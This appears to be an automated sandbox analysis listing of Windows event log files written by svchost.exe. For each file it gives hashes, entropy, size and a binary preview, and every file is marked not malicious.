                                        Preview:ElfChnk.........................................h.....m..................................................................../d..................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F........................................................................................................i..........A....g..1c...............k......**..............@v.YW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-ShellCommon-StartLayoutPopulation%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.4123466903622734
                                        Encrypted:false
                                        SSDEEP:384:vhZ7o7c7r7t7Q7A767/7U7r7W7A777kJ7q747i7T7L7H7P7p7c7/7v7E7iw7p7O6:v
                                        MD5:788B6B13BF6B1506C42A647C90C608FB
                                        SHA1:83A1DF28AAA9431F8BA98910622AB433633D5269
                                        SHA-256:E544869EE0C5829D15D7BFAF95679A6FF09D069B2752870866479980D4DECE5B
                                        SHA-512:6EE60DEE5B9E36106D7A654D241BC8CE2C84FC5DC663C43E270207EB84E4A6419BE19E00CBC6B530A7760F297BC56466619F5F6D17D9D7B8578CA937D3AD044A
                                        Malicious:false
                                        Preview:ElfChnk.....................................Ps.. u...^......................................................................]bJ............................................=...........................................................................................................................f...............?...........................m...................M...F............................6...............1..k............................................................................4......................**..............|.FzT..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Connectivity.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):2.3479804318728847
                                        Encrypted:false
                                        SSDEEP:384:Ghc+uaNuru+uhuKVuPJu5u9u4ufuTuxuDuvuDuOuXumui+udutui4uTAuFuauinw:G6Ovc0S5UyEeDgLcxq3gYi3
                                        MD5:20ABEDB128E5E464C3ADEDAFDD33AABD
                                        SHA1:008B5B5722E9F1C1FC3659745636DA9AC4BF3246
                                        SHA-256:E910DB6310307CE0E3D9AF315BB11B5118C3C82E2077D23CBB5204E604404D5F
                                        SHA-512:8710B94D7EA052FED9E34AAD859242ECAA44D2A21E7C4B8B3CE5BB0A38187D4F155981802A7EB34A931002BC9B841821EA4100F779EFAB52A9D95C69453352EC
                                        Malicious:false
                                        Preview:ElfChnk.........B...............B............v...x..........................................................................:m\.................,.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................6^..................................................................w...............................**...............&3..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-SmbClient%4Security.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.8478731703315486
                                        Encrypted:false
                                        SSDEEP:384:chGuZumutu4uEu5uOuDuyb2uPu1uxuMDpu++uwKuDou13u:cO
                                        MD5:59AB0335EB19F6DD54860AACB86FD9CB
                                        SHA1:3E8217D9EE7123F81F7C87F00C27CFD908350941
                                        SHA-256:98E01AC5F79731DBD6E6ED4F39DDFA1A61F4D84E06BCDE28EFEB53D2CA949BEB
                                        SHA-512:A1B8B98385ACE44DD5B0F9314B7B647609CE122081BD3B06FB66F0BDB0C0970BFA7D8FA87C73AB2586716AEEA2DF7D209D716A094217FF6F93F1DDFF89243AAE
                                        Malicious:false
                                        Preview:ElfChnk......................................$...&..6.5......................................................................./.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................>...........&.......................................................................................**..............Wy.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-StateRepository%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.2240351571410395
                                        Encrypted:false
                                        SSDEEP:384:5hHAxA+AAVA3A0Al9ABtuAbuAbhAbxAboAb5TAbZAbPAU2AWAEAbAJAOhbArnAVT:5uG1mDNqd1ZjCRpazcYu2t
                                        MD5:38BC36F8F4362404E333E07569271DD3
                                        SHA1:A10D1ED540B714D7DEE9300C094DB58B0F4AD018
                                        SHA-256:A7B49B3228A919E34A01B00F9C71958A4391F9FC94EDB3BCA46088A94AA99D59
                                        SHA-512:2F730C5EE594ECF1B0F8E545940AA18E801E61F17CFBD44D8C99C6ADD80E5C29944F679439A7A9B9E855BBD6295A4F20D5B8BB638505E2F9CE660DF919B23019
                                        Malicious:false
                                        Preview:ElfChnk.........................................(...a.GR....................................................................LY..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................Um..................&...m\...........................................S..........................................]W......**..................U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Health.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.769029143659816
                                        Encrypted:false
                                        SSDEEP:384:4hnpg2TpJGpJfpJA3pJ9pJupJjpJkpJRpJapJfpJa5xpJxpJj+1pJQpJtpJAhpJT:45j5D+zAC
                                        MD5:20577B58222FB7BDEFC1300B21345286
                                        SHA1:AC97F48ACFF0FC27E1DA3A55C0322A9DF9ECB08A
                                        SHA-256:CDAC346E2CA13A1D8DE813E3574AD476A4071E25B8B4F919EBB24B38A0EF0C3A
                                        SHA-512:76B832469C31EE2EB6FCD6A5B96828BA84DA2FDEBC972E5C42092D71B61F932F0EB200F5B63BC1B41CA9E86536CFC7269FA909E90FB7899A206E3CD4F4DB15B1
                                        Malicious:false
                                        Preview:ElfChnk.7.......D.......7.......D............9...=...T.^................................................................................................................@...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**......7........qTUW..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.2293376553515465
                                        Encrypted:false
                                        SSDEEP:384:ZhtbpwV1pIvpLfpvQpw2pQYph15pcApLqBpJxTp0qo8psfp4yp4Rphe3p7PpLWBe:ZwDoh1VLHUO2hER7Mkf2q
                                        MD5:310A53947288CB6B830E117FED6CB431
                                        SHA1:9EF3CE4C8CF1C83613ADED2DFDEC20E886E9CA6D
                                        SHA-256:86C884F9E1E28CD0BE2F4B68DD247C8C76F9A2AA83EBD46A9B1380AF053A3D7F
                                        SHA-512:31F063C868A22CE873B40E3FC62661EACF67A5C0B40DD22412CF64924E7CA29CDF44317F5C8CD30524A5AD595531ACF71133943DDA072D81C07FEB62D0204521
                                        Malicious:false
                                        Preview:ElfChnk.\...............\............................N..........................................................................................*.......................R...=...........................................................................................................................f...............?...........................m...................M...F............................................;..^...........&...................................i...................................mS..............**..8...\........=..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.2061151937932604
                                        Encrypted:false
                                        SSDEEP:384:YhwCCRzCaCkClCzCYC/CyCVCGCMCvC3CcvCCC7CaCqCEC:YKFz
                                        MD5:70E70D2CB97D613C0C3E1EA1D74EAA92
                                        SHA1:73F3C23087DB31711E0851550188FDDD6F11B59A
                                        SHA-256:CCDF6F2CA947C96970A0B63EEC1F8CCD753549B2FC6CED8E0C0AB54BEE2AE027
                                        SHA-512:F1900F302272A5319682D7E4B3AA8911DE337EB4059FEB97FB5DD4E25078CB961DEB49C8FF273C82693C3B5867FD9247ED3F2D22AAB5F9F9361BF0CC4004523C
                                        Malicious:false
                                        Preview:ElfChnk.....................................h6...8..3..........................................................................................V.......................~...=...........................................................................................................................f...............?...........................m...................M...F...........................&...................v)............................................................................................../...**..p............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Store%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):67536
                                        Entropy (8bit):4.425383792432925
                                        Encrypted:false
                                        SSDEEP:384:yMsfMMhcS2SxSvoxSlS9SDMUYyMBYdMdYfMdYZMJBMgBMBMWtMcQMyMZMsfMCKaB:+2okpI/o
                                        MD5:3B39E393CEEE32E50D363547A0AB23CC
                                        SHA1:792D8BD151A583C2C7E8D587799404613070A050
                                        SHA-256:2B26398F8F13D86A157F9611A961A88D63A439D132F8F8315201F6944CB07107
                                        SHA-512:1F5C67373209B603A1CBFC6A0394853203A68013934B21382B85C8A21052C1B82C68FC42D943E876F6E7B5031B33A5E0E67BAE45AA09ED3950C247352A7BEC70
                                        Malicious:false
                                        Preview:ElfChnk.z"......."......z"......."...........5...8.....a.....................................................................Q.7................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...........}%..................................u...................................................**.......".........a...........Z7;&.......................................................................F.....!...A.A..............a......r.r.wJ..`..3oX........."...................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e..7*...\..C.....M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.S.t.o.r.e./.O.p.e.r.a.t.i.o.n.a.l......u...............I.......I.n.v.o.k.i.n.g. .l.i.c.e.n.s.e. .m.a.n.a.g.e.r. .b.e.c.a.u.s.e. .l.i.c.e.n.s.e./.l.e.a.s.e. .p.o.l.l.i.n.g. .t.i.m.e. .u.p.:. .P.F.N. .M.i.c.r

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Storsvc%4Diagnostic.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.2305573051374772
                                        Encrypted:false
                                        SSDEEP:384:phL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmfPUmD+UmxUmBUmxUm:pY7LM
                                        MD5:38DDC0D6E2F296743CF4A3E22830F8ED
                                        SHA1:FAA40792E1A6F8AD8CD1EC6EC61E9C0232C20D11
                                        SHA-256:886F12875E0B1F98D5A61C42D96B95F0F8C992DC0F77E428B0CED2CC030913D2
                                        SHA-512:41C548C0D81C02855C71ACCDDCD8B75232459A5C405B94FAA7743495B142F9D1B7F10A7D2F47DB8845E1A5B4987D71BD4728A62B02CE14C248804460C2D32369
                                        Malicious:false
                                        Preview:ElfChnk.....................................04...6..lGz\.....................................................................@.................. .......................H...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................*..................................................................................................**..............a...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-TZUtil%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):0.20419738899088638
                                        Encrypted:false
                                        SSDEEP:48:MzkWTvrP+wTQNRBEZWTENO4bPBFor/6a:yBUNVaO87or/6a
                                        MD5:4290A73D555ED1B522EF91BD46D98040
                                        SHA1:B95BDB305D22FB0E50FBB231ECC965A7F0E85CA6
                                        SHA-256:72D891E6A157629B876199DBA8BF28D4B76ECBC98515FF9991CE8105E4338A06
                                        SHA-512:2C1FB9E8EE13409215F5972F4CD810E90132BD5F9A7A69713333BAB29D3024782C5E3427480533FD86F85B97110AA50792F4DB3552C72EC2E3859EE4E2DCABCA
                                        Malicious:false
                                        Preview:ElfChnk................................................N.......................................................................e................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**...............&..W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.081454356890361
                                        Encrypted:false
                                        SSDEEP:384:OhMiv9i6ri+Hi7EibniWihKixiTijKiFi5iuiUioifiN8ixiEixihiliYi9niO8t:OfNa/xQM9QSp
                                        MD5:F38DD63F1596D1039571A5D80A147980
                                        SHA1:278553D5556ACBAF4E671C41F9A930CA0D253F11
                                        SHA-256:5AC3EDCEBF4CC25A645D62044E94FD695452E12A72D3500D98898E3F766C4875
                                        SHA-512:F6CE9DDF2D6888FB2DBB4C17544E632D8D5057B3C96577F70AD6F3B8EEA84274BFE092D94A0F3D2965DAD553209652AB5A28778C88DF9FDB5A8FA3E7D1EC8FFC
                                        Malicious:false
                                        Preview:ElfChnk.y...............y...................hv...x............................................................................?i................F....#......................=.......................#....................%..................N#...................................%......................f...............?.......................P.......................M...F...............................................v0..I%......v.......................................................................D...............**......y...........S...........g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.3971599419737166
                                        Encrypted:false
                                        SSDEEP:768:6IaonjahaJaFaBaNaZaxa5aVaRaxaRataxaJapaBaZa9aRa5a9a9aRalaxa9alaf:Rn
                                        MD5:567AA8D6C32E58E57348123A512B9F13
                                        SHA1:34B5A43DB4C6A1AD1956E62EF5F74AA7025976B8
                                        SHA-256:3A7340312BA2C74D23F4944FC12C83344586F34255ECF4912281BE7F863C09D7
                                        SHA-512:8ACCBA51812F6807E135A20C9B825E2AC0C94A65AAA54F4C033554105F2723333F9DB6DC120880B036F9E25401C4DE1AE359F5928DE8F7608D23B5C0807A30B0
                                        Malicious:false
                                        Preview:ElfChnk.........@...............@...............h...d..2.....................................................................c..................f...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................&...............................................................?...................................**..P..............W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Device Registration%4Admin.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):1.4147866220767469
                                        Encrypted:false
                                        SSDEEP:384:XhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ3XJpyXJGXJQXJyXJbXJHXJZ:XQ0yUkNYwD8imLEJpmaYm9ZZ
                                        MD5:5AC69472258A06CCE6D64B90D882DD98
                                        SHA1:FE3AFF211337BBEDDF9E188F419495EDEED10F2D
                                        SHA-256:4E1ABC12F4354A38FB1B34228498C106713E751D06F206EFE76B1013DE3B09BD
                                        SHA-512:EC964437F5B9D0D3AB7CD4EB59C9B1215D22C244099C5F3EEFCB18F4B1F0EDC47FD38D3D83F0306136699C498BBBE3FE9C4489E976A7573DFE3E7427A5123A1E
                                        Malicious:false
                                        Preview:ElfChnk......................................D...G...6.m.....................................................................>.................j...........................=...........................................................................................................................f...............?...........................m...................M...F................................................0..........&...........................................................C...........................**..............@V.$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-User Profile Service%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.335502462229597
                                        Encrypted:false
                                        SSDEEP:384:rhjmrmvm3BmOmbmLmomtmImj5pmHm5mxEmtPmoGmNlmmmCmZmLJmAkm2rmqimtmU:rGX5XDcxXaPv
                                        MD5:55C2C83DABDC93F6135C1875602E337D
                                        SHA1:3E825BFC09D43C9310193ED95D28BCC2C3E157CA
                                        SHA-256:587414170FCD20D1ED1BE71F5FB4D39CD2AA9169F694B51997866F7F20023E18
                                        SHA-512:3660BE713BF840ACF9D2B3E3C621D08B27B0A24E836A787351B777E6052E75BF1FE275C2A543A31C338E03B121D067C206E8D5C64320DB4C917D2E6EC443199F
                                        Malicious:false
                                        Preview:ElfChnk......................................6..H8..9........................................................................1z................P.......................x...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................3...........).......................................................**..x...........%...U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.343747536559921
                                        Encrypted:false
                                        SSDEEP:384:Yho27s2m2C2i2g2Q2l2Q2A2g2jl2l2E2k28242A2g2U202Q2G2e2O2n2r2X272XF:Yf0mbm
                                        MD5:90EA562392E0A34BDD8BF8CED995478A
                                        SHA1:A8DB3CEB353E018652470C5D146FBB99755644E8
                                        SHA-256:1394D5A46782AED86CB80F8C9C66D05852229CD03138AD825D855AF3365DECFC
                                        SHA-512:6A9F396A0FA4B52589CE8557BCCCDB77DA5236E2FF47A697F3833FCEA2A1AAE7E75AF1E0E05E8E92F5BB0E26D906C51810C2AB0726C16F1D5C85278C3FC57DE4
                                        Malicious:false
                                        Preview:ElfChnk......................................*...,..i.......................................................................[v..................R.......................z...=...........................................................................................................................f...............?...........................m...................M...F...............................+...............&...................................................................................................**...............b..U..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WER-PayloadHealth%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 10, DIRTY
                                        Category:dropped
                                        Size (bytes):75072
                                        Entropy (8bit):1.77832356166662
                                        Encrypted:false
                                        SSDEEP:1536:McpP9JcY6+g4+Ga6ncpP9JcY6+g4+Ga6:McpP9JcY6+g4+Ga6ncpP9JcY6+g4+Ga6
                                        MD5:B94D54D00E865EB4977DD01981413ACE
                                        SHA1:F7DB3750700527B7308985DAD7783B6AF2DFA59D
                                        SHA-256:A922CD0D14D7B2D8E927EA2DC1902CF569673ACCC78DA73152AD9390E3A1C78C
                                        SHA-512:B29E5E44117ED163DDE2BF5ACECA83B46362323F58E3A53A79AC1EE99C9832231DB7DBAD55DC4CE59A5FFDBB1059C946014C0E2A22E36AB50B9BE460417D7720
                                        Malicious:false
                                        Preview:ElfFile.......................................................................................................................zpElfChnk......................................"...$..3.....................................................................2tr|................Z...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................^...........&.......................................................3...............................**................................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-WMI-Activity%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):3.778019944796982
                                        Encrypted:false
                                        SSDEEP:384:/Kh8R+uRqRERNRiRcRTRRR8RiRDRhRuNRBRCR8R0RCtRgRQRNRTRrRMRhqlRRK/2:CZ
                                        MD5:4376CAD4CDECE3A64C0E734FAED490F6
                                        SHA1:4142FE53D5E342E6A1B5CD09ADEDDCADDFB5476E
                                        SHA-256:3F90108C906E7CE5F0D50C64935DC166FC4A98BB72D029ECBD6398C17DCD96A2
                                        SHA-512:A0DBEC67DCA2CCC37882A47302D59691AAC5FE96D68833790108E747CD83228573C17CA823DAABF33634944B03A534CC821E3F3837147814FFC4838FE032F30E
                                        Malicious:false
                                        Preview:ElfChnk.D.......v.......D.......v...................u%.z.....................................................................D.............................. ..............=..........................................3......................+...........................*...............W.......@...f...`.......4...?......................................E.......M...F...............................................&...................................................................................................**......D.........q.T.........w..b&.......w..b..mPx~?7.2i.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                        C:\Windows\System32\winevt\Logs\Microsoft-Windows-Wcmsvc%4Operational.evtx

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):65536
                                        Entropy (8bit):4.248562733326363
                                        Encrypted:false
                                        SSDEEP:384:ThThquhVh3hfhMhohghrhwhAhS5hqhShmh0hohRhNIh1BwhohGh5h3hShChWhzhM:T80FFpkBQL1
                                        MD5:3B202E0452EBFB9892AEB5D31B114EF9
                                        SHA1:EB516634D8C4E4BC3A1BFF0529DE8084B8C97415
                                        SHA-256:02D362B03A9A229E86546E073260C9F77BBF79142552E0EBE994A4B5EDF1729F
                                        SHA-512:D1B13B90844FFF51F84A84E517DF3B990ED12E13AA375B32A94333059DFAC4D72A309ED3EC830A348AA0011C2FEEEEAD5D4C9CFF6C17A2A7FBDD0B0F8CFC4D0A
                                        Malicious:false
